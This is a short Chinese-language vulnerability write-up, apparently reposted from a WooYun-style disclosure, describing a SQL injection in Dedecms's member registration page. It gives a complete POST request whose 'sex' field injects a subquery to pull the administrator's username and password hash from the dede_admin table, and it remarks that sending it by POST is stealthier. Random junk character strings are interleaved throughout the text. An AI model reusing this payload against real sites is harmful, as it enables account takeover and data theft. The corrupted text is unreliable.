漏洞类型: SQL注射漏洞
9 E0 P: s% a3 c. ]& X" r) J: N0 a简要描述:
1 T1 g' T/ O1 Z! z2 ^9 A" I : S" H j" Z+ ^6 x Y
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.. p3 g1 |7 s+ }0 N2 I
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.% [$ f$ ~1 i" t+ x" G2 x2 H# I
详细说明:跟这个漏洞1 c4 }0 r" U* h. P
. W* f7 _7 W7 a/ o* r8 C% ~( p) W7 U
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
6 F+ L# K' }2 s- I+ T是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
6 j' D: h- Y8 Y4 K) ^: O) EPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
8 _1 _7 s' U; K! V; M. r, `
7 v. ~8 {6 ~. D C6 w# v5 `; Zwww.political-security.com/member/reg_new.php
P8 R0 D, T0 r7 y; g9 y
5 m5 Y( S& a8 \) nPOST
! e( X& h) g, K* `0 M3 l
# w( a& s/ U7 u4 ?9 P- }dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
+ l4 [3 S- T7 A luserid=c4rp3nt3r&uname=c4rp3nt3r
8 r: u1 a. V f4 z6 |. X- E0 z&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
6 `9 v0 b& a# K% z' u&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
* }; G1 n( L# Q$ z4 ~7 S2 B(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
6 i) L' r3 D- g1 x- w; T6 T( ~4 h%00&vdcode=glos&agree= |